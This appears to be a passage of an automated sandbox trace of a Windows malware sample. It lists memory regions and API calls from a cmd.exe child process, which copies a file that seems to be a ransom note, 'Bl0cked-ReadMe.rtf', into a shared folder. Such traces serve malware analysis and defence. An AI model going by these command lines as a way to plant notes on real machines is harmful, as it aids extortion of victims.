id = 28282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28283 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28284 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28285 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28286 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28290 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 28291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 625 os_tid = 0xa68 Process: id = "435" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28306 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 28307 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28311 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28382 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28383 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28384 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28385 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 28386 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 28387 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28388 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28389 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28390 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28391 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28392 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28393 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28394 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28395 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28396 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 28397 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28398 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28399 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28400 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 28401 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28402 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 28403 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 28404 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28405 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 627 os_tid = 0x994 [0192.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbdc | out: lpSystemTimeAsFileTime=0x18fbdc*(dwLowDateTime=0xa7d4d160, dwHighDateTime=0x1d440a9)) [0192.859] GetCurrentProcessId () returned 0xf54 [0192.859] GetCurrentThreadId () returned 0x994 [0192.859] GetTickCount () returned 0x36d23 [0192.859] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbd4 | out: lpPerformanceCount=0x18fbd4*=24964825037) returned 1 [0192.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.860] __set_app_type (_Type=0x1) [0192.860] __p__fmode () returned 0x76b331f4 [0192.860] __p__commode () returned 0x76b331fc [0192.860] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.860] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.860] GetCurrentThreadId () returned 0x994 [0192.860] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x38 [0192.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.860] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb6c | out: phkResult=0x18fb6c*=0x0) returned 0x2 [0192.860] VirtualQuery (in: lpAddress=0x18fba3, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.860] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.860] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.861] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.861] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.861] GetConsoleOutputCP () returned 0x1b5 [0192.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.861] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.861] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.862] GetEnvironmentStringsW () returned 0x250190* [0192.862] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0192.862] GetEnvironmentStringsW () returned 0x250190* [0192.862] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0192.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eadc | out: phkResult=0x18eadc*=0x40) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0xb8, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x0, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegCloseKey (hKey=0x40) returned 0x0 [0192.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eadc | out: phkResult=0x18eadc*=0x40) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x0, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.863] RegCloseKey (hKey=0x40) returned 0x0 [0192.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.863] srand (_Seed=0x5b88639a) [0192.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" [0192.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" [0192.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.863] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.864] GetEnvironmentStringsW () returned 0x2522e0* [0192.864] FreeEnvironmentStringsW (penv=0x2522e0) returned 1 [0192.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f8a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.864] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f8a8, lpFilePart=0x18f8a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f8a4*="Desktop") returned 0x18 [0192.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.864] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.864] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.865] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.865] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.865] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.865] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.865] GetEnvironmentStringsW () returned 0x252b00* [0192.865] FreeEnvironmentStringsW (penv=0x252b00) returned 1 [0192.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.866] GetConsoleOutputCP () returned 0x1b5 [0192.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.866] GetUserDefaultLCID () returned 0x409 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="0") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="0") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="1") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.867] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.868] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.868] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.868] _wcsicmp (_String1="type", _String2=")") returned 75 [0192.868] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0192.868] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0192.868] _wcsicmp (_String1="IF", _String2="type") returned -11 [0192.868] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0192.868] _wcsicmp (_String1="REM", _String2="type") returned -2 [0192.868] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] GetFileType (hFile=0x7) returned 0x2 [0192.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f8e0 | out: lpMode=0x18f8e0) returned 1 [0192.872] _dup (_FileHandle=1) returned 3 [0192.873] _close (_FileHandle=1) returned 0 [0192.873] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0192.873] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f8b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0192.874] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0192.874] GetConsoleTitleW (in: lpConsoleTitle=0x18f6e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.874] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0192.874] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0192.874] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0192.874] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0192.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.875] FindFirstFileExW (in: 